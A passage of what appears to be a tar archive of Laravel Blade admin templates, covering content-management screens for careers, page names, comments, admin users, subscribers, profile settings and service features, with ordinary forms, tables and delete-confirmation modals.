$career->type == 'image' ? 'checked' : '' }}><span class="ml-3">{{ __('content.image') }}</span> <i class="input-helper"></i> </label> </div> </fieldset> <div class="form-group" id="icon-type" style="{{ $career->type == 'icon' ? 'display:block' : 'display:none' }}"> <label for="icon" class="d-block">{{ __('content.icon') }}</label> <div class="btn-group"> <input type="hidden" name="icon" class="form-control" id="icon" value="{{ $career->icon }}"> <button type="button" class="btn btn-primary iconpicker-component"><i id="icon-value" class="{{ $career->icon }} iconpicker-component"></i></button> <button type="button" id="iconPickerBtn" class="icp icp-dd btn btn-primary dropdown-toggle iconpicker-component" data-selected="fa-car" data-toggle="dropdown"> <span class="caret"></span> </button> <div class="dropdown-menu"></div> </div> </div> <div id="image-type" style="{{ $career->type == 'image' ? 'display:block' : 'display:none' }}"> <div class="form-group"> <label for="section_image">{{ __('content.image') }} ({{ __('content.size') }} 64 x 64) (.svg, .jpg, .jpeg, .png, .webp, .gif)</label> <input type="file" name="section_image" class="form-control-file" id="section_image"> <small class="form-text text-muted">{{ __('content.please_use_recommended_sizes') }}</small> </div> <div class="height-card box-margin"> <div class="card"> <div class="card-body"> <div class="avatar-area text-center"> <div class="media"> @if (!empty($career->section_image)) <a class="d-block mx-auto" href="#" data-toggle="tooltip" data-placement="top" data-original-title="{{ __('content.current_image') }}"> <img src="{{ asset('uploads/img/career/'.$career->section_image) }}" alt="image" class="rounded"> </a> @else <a class="d-block mx-auto" href="#" data-toggle="tooltip" data-placement="top" data-original-title="{{ __('content.not_yet_created') }}"> <img src="{{ asset('uploads/img/dummy/no-image.jpg') }}" alt="no image" class="rounded w-25"> </a> @endif </div> @if (!empty($career->section_image)) <a class="mt-3 d-block" href="#" data-toggle="modal" data-target="#deleteImageModal{{ $career->id }}"> <i class="fa fa-trash text-danger font-18"></i> </a> @endif </div> <!--end card-body--> </div> </div> <!--end card--> </div> <!--end col--> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="button_name">{{ __('content.button_name') }} </label> <input id="button_name" name="button_name" type="text" class="form-control" value="{{ $career->button_name }}"> <small class="form-text text-muted">{{ __('content.when_you_leave_this_section_blank_it_will_go_to_its_own_detail_page') }}</small> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="button_url">{{ __('content.button_url') }} </label> <input id="button_url" name="button_url" type="text" class="form-control" value="{{ $career->button_url }}"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="order">{{ __('content.order') }}</label> <input type="number" name="order" class="form-control" id="order" value="{{ $career->order }}"> </div> </div> <div class="col-xl-12"> <div class="form-group"> <label for="status" class="col-form-label">{{ __('content.status') }} </label> <select class="form-control" name="status" id="status"> <option value="published" selected>{{ __('content.select_your_option') }}</option> <option value="published" {{ $career->status == 'published' ? 'selected' : '' }}>{{ __('content.published') }}</option> <option value="draft" {{ $career->status == 'draft' ? 'selected' : '' }}>{{ __('content.draft') }}</option> </select> </div> </div> <div class="col-md-12"> <div class="form-group"> <small class="form-text text-muted">{{ __('content.required_fields') }}</small> </div> </div> <div class="col-md-12"> <div class="form-group"> <button type="submit" class="btn btn-primary">{{ __('content.submit') }}</button> </div> </div> </div> </form> <!-- Modal --> <div class="modal fade" id="deleteImageModal{{ $career->id }}" tabindex="-1" role="dialog" aria-labelledby="deleteImageModalCenterTitle" aria-hidden="true"> <div class="modal-dialog modal-dialog-centered modal-sm" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="deleteImageModalCenterTitle">{{ __('content.delete') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-label="{{ __('content.close') }}"> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body text-center"> {{ __('content.you_wont_be_able_to_revert_this') }} </div> <div class="modal-footer"> <form class="d-inline-block" action="{{ route('career.destroy_image', $career->id) }}" method="POST"> @method('DELETE') @csrf <button type="button" class="btn btn-danger mr-1" data-dismiss="modal">{{ __('content.cancel') }}</button> <button type="submit" class="btn btn-success">{{ __('content.yes_delete_it') }}</button> </form> </div> </div> </div> </div> </div> </div> </div> <!-- end row --> @endsection �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/admin/page_name/create.blade.php��������������������������������������������������������������0000644�����������������00000026457�14765366572�0013772 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@extends('layouts.admin.master') @section('content') <div class="row"> <div class="col-12 box-margin"> <div class="card"> <div class="card-body"> <div class="d-flex justify-content-between align-items-center mb-20"> <h6 class="card-title mb-0">{{ __('content.pages') }}</h6> <div> <button type="button" class="btn btn-primary float-right mb-3" data-toggle="modal" data-target="#pageNameModal">+ {{ __('content.add_page_name') }}</button> </div> </div> @if (count($page_names) > 0) <div> <input id="check_all" type="checkbox" onclick="showHideDeleteButton(this)"> <label for="check_all">{{ __('content.all') }}</label> <a id="deleteChecked" class="ml-2" href="#" data-toggle="modal" data-target="#deleteCheckedModal"> <i class="fa fa-trash text-danger font-18"></i> </a> </div> @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form onsubmit="return btnCheckListGet()" action="{{ route('page-name.destroy_checked') }}" method="POST"> @method('DELETE') @csrf @endif <input type="hidden" id="checked_lists" name="checked_lists" value=""> <!-- Modal --> <div class="modal fade" id="deleteCheckedModal" tabindex="-1" role="dialog" aria-labelledby="deleteCheckedModalCenterTitle" aria-hidden="true"> <div class="modal-dialog modal-dialog-centered modal-sm" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="deleteCheckedModalCenterTitle">{{ __('content.delete') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-label="{{ __('content.close') }}"> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body text-center"> {{ __('content.delete_selected') }} </div> <div class="modal-footer"> <button type="button" class="btn btn-danger" data-dismiss="modal">{{ __('content.cancel') }}</button> <button onclick="btnCheckListGet()" type="submit" class="btn btn-success">{{ __('content.yes_delete_it') }}</button> </div> </div> </div> </div> </form> <table id="basic-datatable" class="table table-striped dt-responsive nowrap w-100"> <thead> <tr> <th scope="col">#</th> <th>{{ __('content.page_name') }}</th> <th>{{ __('content.is_default') }}</th> <th>{{ __('content.order') }}</th> <th class="custom-width-action">{{ __('content.action') }}</th> </tr> </thead> <tbody> @foreach ($page_names as $page_name) <tr> <td> @if ($page_name->is_default != 'yes') <input name="check_list[]" type="checkbox" value="{{ $page_name->id }}" onclick="showHideDeleteButton2(this)"> @else <span class="d-none">.</span> @endif </td> <td>{{ $page_name->page_name }}</td> <td> @if($page_name->is_default == 'no') <span class="badge badge-danger">{{ __('content.no') }}</span> @else <span class="badge badge-success">{{ __('content.yes') }}</span> @endif </td> <td>{{ $page_name->order }}</td> <td> @if ($page_name->is_default != 'yes') <div> <a href="{{ route('page-name.edit', $page_name->id) }}" class="mr-2"> <i class="fa fa-edit text-info font-18"></i> </a> <a href="#" data-toggle="modal" data-target="#deleteModel{{ $page_name->id }}"> <i class="fa fa-trash text-danger font-18"></i> </a> </div> @endif </td> </tr> @if ($page_name->is_default != 'yes') <!-- Modal --> <div class="modal fade" id="deleteModel{{ $page_name->id }}" tabindex="-1" role="dialog" aria-labelledby="exampleModalCenterTitle" aria-hidden="true"> <div class="modal-dialog modal-dialog-centered modal-sm" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="exampleModalCenterTitle">{{ __('content.delete') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-label="{{ __('content.close') }}"> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body text-center"> {{ __('content.you_wont_be_able_to_revert_this') }} </div> <div class="modal-footer"> @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form class="d-inline-block" action="{{ route('page-name.destroy', $page_name->id) }}" method="POST"> @method('DELETE') @csrf @endif <button type="button" class="btn btn-danger" data-dismiss="modal">{{ __('content.cancel') }}</button> <button type="submit" class="btn btn-success">{{ __('content.yes_delete_it') }}</button> </form> </div> </div> </div> </div> @endif @endforeach </tbody> </table> @else <span>{{ __('content.not_yet_created') }}</span> @endif </div> <!-- end card body--> </div> <!-- end card --> </div><!-- end col--> </div><!-- end row--> <div class="modal fade" id="pageNameModal" tabindex="-1" role="dialog" aria-labelledby="pageNameModalLabel" aria-modal="false"> <div class="modal-dialog modal-md"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title mt-0 font-16" id="pageNameModalLabel">{{ __('content.add_new') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button> </div> <div class="modal-body"> @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form action="{{ route('page-name.store') }}" method="POST"> @csrf @endif <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="page_name">{{ __('content.page_name') }} <span class="text-red">*</span></label> <input type="text" name="page_name" class="form-control" id="page_name" required> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="order">{{ __('content.order') }}</label> <input type="number" name="order" class="form-control" id="order" value="0"> </div> </div> <div class="col-md-12"> <div class="form-group"> <small class="form-text text-muted">{{ __('content.required_fields') }}</small> </div> </div> </div> <button type="submit" class="btn btn-sm btn-primary">{{ __('content.submit') }}</button> </form> </div> </div><!-- /.modal-content --> </div><!-- /.modal-dialog --> </div><!-- /.modal --> @endsection �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/admin/page_name/edit.blade.php����������������������������������������������������������������0000644�����������������00000004714�14765366572�0013444 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@extends('layouts.admin.master') @section('content') <!-- Form row --> <div class="row"> <div class="col-xl-12 box-margin height-card"> <div class="card card-body"> <div class="d-md-flex justify-content-between align-items-center mb-20"> <h4 class="card-title">{{ __('content.edit_page_name') }}</h4> <div> <a href="{{ url()->previous() }}" class="btn btn-primary"><i class="fas fa-angle-left"></i> {{ __('content.back') }}</a> </div> </div> @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form action="{{ route('page-name.update', $page_name->id) }}" method="POST"> @method('PUT') @csrf @endif <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="page_name">{{ __('content.page_name') }} <span class="text-red">*</span></label> <input type="text" name="page_name" class="form-control" id="page_name" value="{{ $page_name->page_name }}"> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="order">{{ __('content.order') }}</label> <input type="number" name="order" class="form-control" id="order" value="{{ $page_name->order }}" required> </div> </div> <div class="col-md-12"> <div class="form-group"> <small class="form-text text-muted">{{ __('content.required_fields') }}</small> </div> </div> <div class="col-md-12"> <button type="submit" class="btn btn-primary mr-2">{{ __('content.submit') }}</button> </div> </div> </form> </div> </div> </div> <!-- end row --> @endsection ����������������������������������������������������views/admin/comment/index.blade.php�����������������������������������������������������������������0000644�����������������00000014537�14765366572�0013360 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@extends('layouts.admin.master') @section('content') <!-- Include Alert Blade --> @include('admin.alert.alert') <div class="row"> <div class="col-12 box-margin"> <div class="card"> <div class="card-body"> <div class="d-flex justify-content-between align-items-center mb-20"> <h6 class="card-title mb-0">{{ __('content.comments') }}</h6> <div> <form class="d-block ml-auto" action="{{ route('comment-section.mark_all_approval_update') }}" method="POST"> @csrf @method('PATCH') <button type="submit" class="btn btn-primary mb-3ine"> <i class="fas fa-bookmark"></i> {{ __('content.mark_all_as_approval') }} </button> </form> </div> </div> @if (count($comments) > 0) <table id="basic-datatable" class="table table-striped dt-responsive w-100"> <thead> <tr> <th scope="col">#</th> <th>{{ __('content.name') }}</th> <th>{{ __('content.email') }}</th> <th>{{ __('content.comment') }}</th> <th>{{ __('content.approval_status') }}</th> <th>{{ __('content.action') }}</th> </tr> </thead> <tbody> @php $i = 1; @endphp @foreach ($comments as $comment) <tr> <td>{{ $i++ }}</td> <td><a href="{{ url('blog/'.$comment->blog->slug) }}" target="_blank">{{ $comment->name }}</a></td> <td>{{ $comment->email }}</td> <td>{{ $comment->comment }}</td> <td> @if ($comment->approval == 0) <span>{{ __('content.pending_approval') }}</span> @else <span>{{ __('content.approval') }}</span> @endif </td> <td> <div> @if ($comment->approval == 0) <form class="d-inline" action="{{ route('comment-section.update', $comment->id) }}" method="POST"> @method('PUT') @csrf <button type="submit" data-toggle="tooltip" class="btn btn-primary mr-2 pt-2 pb-2 pr-3 pl-3" data-original-title="{{ __('content.mark') }}"> <i class="fas fa-bookmark"></i> </button> </form> @endif <a href="#" data-toggle="modal" data-target="#deleteModal{{ $comment->id }}"> <i class="fa fa-trash text-danger font-18"></i> </a> </div> </td> </tr> <!-- Modal --> <div class="modal fade" id="deleteModal{{ $comment->id }}" tabindex="-1" role="dialog" aria-labelledby="messageModalCenterTitle" aria-hidden="true"> <div class="modal-dialog modal-dialog-centered modal-sm" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="messageModalCenterTitle">{{ __('content.delete') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-label="{{ __('content.close') }}"> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body text-center"> {{ __('content.you_wont_be_able_to_revert_this') }} </div> <div class="modal-footer"> <form class="d-inline-block" action="{{ route('comment-section.destroy', $comment->id) }}" method="POST"> @method('DELETE') @csrf <button type="button" class="btn btn-danger" data-dismiss="modal">{{ __('content.cancel') }}</button> <button type="submit" class="btn btn-success">{{ __('content.yes_delete_it') }}</button> </form> </div> </div> </div> </div> @endforeach </tbody> </table> @else <span>{{ __('content.not_yet_created') }}</span> @endif </div> <!-- end card body--> </div> <!-- end card --> </div><!-- end col--> </div><!-- end row--> @endsection�����������������������������������������������������������������������������������������������������������������������������������������������������������������views/admin/admin_user/create.blade.php�������������������������������������������������������������0000644�����������������00000010567�14765366572�0014177 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@extends('layouts.admin.master') @section('content') <!-- Include Alert Blade --> @include('admin.alert.alert') <!-- Form row --> <div class="row"> <div class="col-xl-12 box-margin height-card"> <div class="card card-body"> <h4 class="card-title">{{ __('content.add_admin_user') }}</h4> @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form action="{{ route('admin-user.store') }}" method="POST" enctype="multipart/form-data"> @csrf @endif <div class="row"> <div class="col-md-12"> <div class="row"> <div class="col-md-12"> <div class="form-group form-group-default"> <label for="role_id">{{ __('content.role_name') }} <span class="text-red">*</span></label> <select class="form-control" name="role_id" id="role_id" required> @foreach($admin_roles as $admin_role) <option value="{{$admin_role->id}}">{{$admin_role->name}}</option> @endforeach </select> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="name">{{ __('content.name') }} <span class="text-red">*</span></label> <input id="name" name="name" type="text" class="form-control" required> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="email">{{ __('content.email') }} <span class="text-red">*</span></label> <input id="email" name="email" type="email" class="form-control" required> </div> </div> <div class="col-12"> <div class="form-group"> <label for="password">{{ __('content.new_password') }} <span class="text-red">*</span></label> <input id="password" name="password" type="password" class="form-control" required> </div> </div> <div class="col-12"> <div class="form-group"> <label for="confirmPass">{{ __('content.confirm_password') }} <span class="text-red">*</span></label> <input id="confirmPass" name="password_confirmation" type="password" class="form-control" required> </div> </div> <div class="col-md-6"> <div class="form-group "> <label for="image">{{ __('content.image') }} ({{ __('content.size') }} 128x128)(.png, .jpg, .jpeg)</label> <input id="image" name="profile_photo_path" type="file" class="form-control-file"> </div> </div> <div class="col-md-12"> <div class="form-group"> <button type="submit" class="btn btn-primary">{{ __('content.submit') }}</button> </div> </div> </div> </div> </div> </form> </div> </div> </div> <!-- end row --> @endsection�����������������������������������������������������������������������������������������������������������������������������������������views/admin/admin_user/index.blade.php��������������������������������������������������������������0000644�����������������00000014466�14765366572�0014045 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@extends('layouts.admin.master') @section('content') <!-- Include Alert Blade --> @include('admin.alert.alert') <div class="row"> <div class="col-12 box-margin"> <div class="card"> <div class="card-body"> <div class="d-md-flex justify-content-between align-items-center mb-20"> <h6 class="card-title mb-0">{{ __('content.all_admin') }}</h6> <div> <a href="{{ url('admin/admin-user/create') }}" class="btn btn-primary float-right mb-3">+ {{ __('content.add_admin_user') }}</a> </div> </div> @if (count($admin_users) > 0) <div> <label for="created_by_super_admin">All Admin Created By Super Admin</label> </div> <table id="basic-datatable" class="table table-striped dt-responsive nowrap w-100"> <thead> <tr> <th>{{ __('content.image') }}</th> <th>{{ __('content.role_name') }}</th> <th>{{ __('content.name') }}</th> <th>{{ __('content.email') }}</th> <th class="custom-width-action">{{ __('content.action') }}</th> </tr> </thead> <tbody> @php $desc = count($admin_users); $asc=0; @endphp @foreach ($admin_users as $admin_user) @if ($admin_user->getRoleNames()->first() != "super-admin") <tr> <td> @if (!empty($admin_user->profile_photo_path)) <img class="image-size img-fluid" src="{{ asset('uploads/img/profile/admin/'.$admin_user->profile_photo_path) }}" alt="user image"> @else <img class="image-size img-fluid" src="{{ asset('uploads/img/dummy/no-image.jpg') }}" alt="no image"> @endif </td> <td>{{ $admin_user->getRoleNames()->first() }}</td> <td>{{ $admin_user->name }}</td> <td>{{ $admin_user->email }}</td> <td> <div> <a href="{{ route('admin-user.edit', $admin_user->id) }}" class="mr-2"> <i class="fa fa-edit text-info font-18"></i> </a> <a href="#" data-toggle="modal" data-target="#deleteModel{{ $admin_user->id }}"> <i class="fa fa-trash text-danger font-18"></i> </a> </div> </td> </tr> <!-- Modal --> <div class="modal fade" id="deleteModel{{ $admin_user->id }}" tabindex="-1" role="dialog" aria-labelledby="exampleModalCenterTitle" aria-hidden="true"> <div class="modal-dialog modal-dialog-centered modal-sm" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="exampleModalCenterTitle">{{ __('content.delete') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-label="{{ __('content.close') }}"> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body text-center"> {{ __('content.you_wont_be_able_to_revert_this') }} </div> <div class="modal-footer"> @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form class="d-inline-block" action="{{ route('admin-user.destroy', $admin_user->id) }}" method="POST"> @method('DELETE') @csrf @endif <button type="button" class="btn btn-danger" data-dismiss="modal">{{ __('content.cancel') }}</button> <button type="submit" class="btn btn-success">{{ __('content.yes_delete_it') }}</button> </form> </div> </div> </div> </div> @endif @endforeach </tbody> </table> @else <span>{{ __('content.not_yet_created') }}</span> @endif </div> <!-- end card body--> </div> <!-- end card --> </div><!-- end col--> </div><!-- end row--> @endsection����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/admin/admin_user/edit.blade.php���������������������������������������������������������������0000644�����������������00000011733�14765366572�0013655 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@extends('layouts.admin.master') @section('content') <!-- Include Alert Blade --> @include('admin.alert.alert') <!-- Form row --> <div class="row"> <div class="col-xl-12 box-margin height-card"> <div class="card card-body"> <div class="d-md-flex justify-content-between align-items-center mb-20"> <h4 class="card-title">{{ __('content.edit_admin_user') }}</h4> <div> <a href="{{ url()->previous() }}" class="btn btn-primary"><i class="fas fa-angle-left"></i> {{ __('content.back') }}</a> </div> </div> @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form action="{{ route('admin-user.update', $admin_user->id) }}" method="POST" enctype="multipart/form-data"> @method('PUT') @csrf @endif <div class="row"> <div class="col-md-12"> <div class="form-group form-group-default"> <label for="role_id">{{ __('content.role_name') }} <span class="text-red">*</span></label> <select class="form-control" name="role_id" id="role_id" required> @foreach($admin_roles as $admin_role) <option value="{{$admin_role->id}}" {{ $admin_role->name == $admin_user->getRoleNames()->first() ? 'selected' : '' }}>{{ $admin_role->name }}</option> @endforeach </select> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="name">{{ __('content.name') }} <span class="text-red">*</span></label> <input id="name" name="name" type="text" class="form-control" value="{{ $admin_user->name }}" required> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="email">{{ __('content.email') }} <span class="text-red">*</span></label> <input id="email" name="email" type="email" class="form-control" value="{{ $admin_user->email }}" required> </div> </div> <div class="col-12"> <div class="form-group"> <label for="password">{{ __('content.new_password') }} <span class="text-red">*</span></label> <input id="password" name="password" type="password" class="form-control" required> </div> </div> <div class="col-12"> <div class="form-group"> <label for="confirmPass">{{ __('content.confirm_password') }} <span class="text-red">*</span></label> <input id="confirmPass" name="password_confirmation" type="password" class="form-control" required> </div> </div> <div class="col-md-6"> <div class="form-group "> <label for="image">{{ __('content.image') }} ({{ __('content.size') }} 128x128)(.png, .jpg, .jpeg)</label> <input id="image" name="profile_photo_path" type="file" class="form-control-file"> @if (!empty($admin_user->profile_photo_path)) <img src="{{ asset('uploads/img/profile/admin/'.$admin_user->profile_photo_path) }}" class="img-fluid image-size rounded-circle mt-3" alt="profile image"> @else <img src="{{ asset('uploads/img/dummy/128x128.jpg') }}" class="img-fluid image-size rounded-circle mt-3" alt="profile image"> @endif </div> </div> <div class="col-md-12"> <div class="form-group"> <button type="submit" class="btn btn-primary">{{ __('content.submit') }}</button> </div> </div> </div> </form> </div> </div> </div> <!-- end row --> @endsection�������������������������������������views/admin/subscribe/create.blade.php��������������������������������������������������������������0000644�����������������00000014323�14765366572�0014024 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@extends('layouts.admin.master') @section('content') <div class="row"> <div class="col-12 box-margin"> <div class="card"> <div class="card-body"> <div class="d-md-flex justify-content-between align-items-center mb-20"> <h6 class="card-title mb-0">{{ __('content.subscribers') }}</h6> <div> <button type="button" class="btn btn-primary mb-3" data-toggle="modal" data-target="#subscriberModal">+ {{ __('content.add_subscriber') }}</button> </div> </div> @if (count($subscribers) > 0) <table id="basic-datatable" class="basic-datatable table table-striped dt-responsive w-100"> <thead> <tr> <th scope="col">#</th> <th>{{ __('content.email') }}</th> <th class="custom-width-action">{{ __('content.action') }}</th> </tr> </thead> <tbody> @php $desc = count($subscribers); $asc=0; @endphp @foreach ($subscribers as $subscriber) <tr> <td> <span class="d-none">{{ $asc++ }}{{ $desc-- }}</span> </td> <td><a href="mailto:{{ $subscriber->email }}">{{ $subscriber->email }}</a></td> <td> <div> <a href="#" data-toggle="modal" data-target="#deleteModal{{ $subscriber->id }}"> <i class="fa fa-trash text-danger font-18"></i> </a> </div> </td> </tr> <!-- Modal --> <div class="modal fade" id="deleteModal{{ $subscriber->id }}" tabindex="-1" role="dialog" aria-labelledby="deleteModalCenterTitle" aria-hidden="true"> <div class="modal-dialog modal-dialog-centered modal-sm" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="deleteModalCenterTitle">{{ __('content.delete') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-label="{{ __('content.close') }}"> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body text-center"> {{ __('content.you_wont_be_able_to_revert_this') }} </div> <div class="modal-footer"> <form class="d-inline-block" action="{{ route('subscribe.destroy', $subscriber->id) }}" method="POST"> @method('DELETE') @csrf <button type="button" class="btn btn-danger" data-dismiss="modal">{{ __('content.cancel') }}</button> <button type="submit" class="btn btn-success">{{ __('content.yes_delete_it') }}</button> </form> </div> </div> </div> </div> @endforeach </tbody> </table> @else <span>{{ __('content.not_yet_created') }}</span> @endif </div> <!-- end card body--> </div> <!-- end card --> </div><!-- end col--> </div><!-- end row--> <!-- Modal --> <div class="modal fade" id="subscriberModal" tabindex="-1" role="dialog" aria-labelledby="subscriberModalLabel" aria-modal="false"> <div class="modal-dialog modal-md"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title mt-0 font-16" id="subscriberModalLabel">{{ __('content.add_new') }}</h5> <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button> </div> <div class="modal-body"> <form action="{{ route('subscribe.store') }}" method="POST"> @csrf <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="email">{{ __('content.email') }} <span class="text-red">*</span></label> <input type="text" name="email" class="form-control" id="email" required> </div> </div> <div class="col-md-12"> <div class="form-group"> <small class="form-text text-muted">{{ __('content.required_fields') }}</small> </div> </div> </div> <button type="submit" class="btn btn-sm btn-primary">{{ __('content.submit') }}</button> </form> </div> </div><!-- /.modal-content --> </div><!-- /.modal-dialog --> </div><!-- /.modal --> @endsection �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/admin/profile/change-password.blade.php�������������������������������������������������������0000644�����������������00000004515�14765366572�0015327 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@extends('layouts.admin.master') @section('content') <!-- Include Alert Blade --> @include('admin.alert.alert') <!-- Form row --> <div class="row"> <div class="col-xl-12 box-margin height-card"> <div class="card card-body"> <h4 class="card-title">{{ __('content.change_password') }}</h4> @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form action="{{ route('profile.change_password_update') }}" method="POST"> @method('PUT') @csrf @endif <div class="row"> <div class="col-12"> <div class="form-group"> <label for="currentPass">{{ __('content.current_password') }} <span class="text-red">*</span></label> <input id="currentPass" name="current_password" type="password" class="form-control" required> </div> </div> <div class="col-12"> <div class="form-group"> <label for="password">{{ __('content.new_password') }} <span class="text-red">*</span></label> <input id="password" name="password" type="password" class="form-control" required> </div> </div> <div class="col-12"> <div class="form-group"> <label for="confirmPass">{{ __('content.confirm_password') }} <span class="text-red">*</span></label> <input id="confirmPass" name="password_confirmation" type="password" class="form-control" required> </div> </div> <div class="col-12"> <button type="submit" class="btn btn-success"> {{ __('content.update') }} </button> </div> </div> </form> </div> </div> </div> <!-- end row --> @endsection �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/admin/profile/edit.blade.php������������������������������������������������������������������0000644�����������������00000005476�14765366572�0013176 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@extends('layouts.admin.master') @section('content') <!-- Include Alert Blade --> @include('admin.alert.alert') <!-- Form row --> <div class="row"> <div class="col-xl-12 box-margin height-card"> <div class="card card-body"> <h4 class="card-title">{{ __('content.profile') }}</h4> @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form action="{{ route('profile.update', $user->id) }}" method="POST" enctype="multipart/form-data"> @method('PUT') @csrf @endif <div class="row"> <div class="col-md-12"> <div class="form-group"> <label for="name">{{ __('content.name') }} <span class="text-red">*</span></label> <input id="name" name="name" type="text" class="form-control" value="{{ $user->name }}" required> </div> </div> <div class="col-md-12"> <div class="form-group"> <label for="email">{{ __('content.email') }} <span class="text-red">*</span></label> <input id="email" name="email" type="email" class="form-control" value="{{ $user->email }}" required> </div> </div> <div class="col-md-6"> <div class="form-group "> <label for="image">{{ __('content.image') }} ({{ __('content.size') }} 128x128)(.png, .jpg, .jpeg)</label> <input id="image" name="profile_photo_path" type="file" class="form-control-file"> @if (!empty($user->profile_photo_path)) <img src="{{ asset('uploads/img/profile/'.$user->profile_photo_path) }}" class="img-fluid image-size rounded-circle mt-3" alt="profile image"> @else <img src="{{ asset('uploads/img/dummy/128x128.jpg') }}" class="img-fluid image-size rounded-circle mt-3" alt="profile image"> @endif </div> </div> <div class="col-12"> <button type="submit" class="btn btn-primary"> {{ __('content.submit') }} </button> </div> </div> </form> </div> </div> </div> <!-- end row --> @endsection ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������views/admin/service/feature/create.blade.php��������������������������������������������������������0000644�����������������00000041374�14765366572�0015144 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������@extends('layouts.admin.master') @section('content') <div class="row"> <div class="col-12 box-margin"> <div class="card"> <div class="card-body"> <div class="d-md-flex justify-content-between align-items-center mb-20"> <h6 class="card-title mb-0">{{ __('content.service_features') }}</h6> <div> <button type="button" class="btn btn-primary mb-3 mr-2" data-toggle="modal" data-target="#serviceFeatureSectionModal">{{ __('content.section_title_and_description') }}</button> <button type="button" class="btn btn-primary mb-3" data-toggle="modal" data-target="#serviceFeatureModal">+ {{ __('content.add_service_feature') }}</button> </div> </div> @if (count($service_features) > 0) <div> <input id="check_all" type="checkbox" onclick="showHideDeleteButton(this)"> <label for="check_all">{{ __('content.all') }}</label> <a id="deleteChecked" class="ml-2" href="#" data-toggle="modal" data-target="#deleteCheckedModal"> <i class="fa fa-trash text-danger font-18"></i> </a> </div> @if ($demo_mode == "on") <!-- Include Alert Blade --> @include('admin.demo_mode.demo-mode') @else <form onsubmit="return btnCheckListGet()" action="{{ route('service-feature.destroy_checked', $id) }}" method="POST"> @method('DELETE') @csrf @endif <input type="hidden" id="checked_lists" name="checked_lists" value=""> <!-- Modal --> <div class="modal fade" id="deleteCheckedModal" tabindex="-1" role="dialog" aria-labelledby="deleteCheckedModalCenterTitle" aria-hidden="true"> <div class="modal-dialog modal-dialog-centered modal-sm" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="deleteCheckedModalCenterTitle">{{ __('content.delete') }}</h5> <button type="button" class="close" data-dismiss="modal" 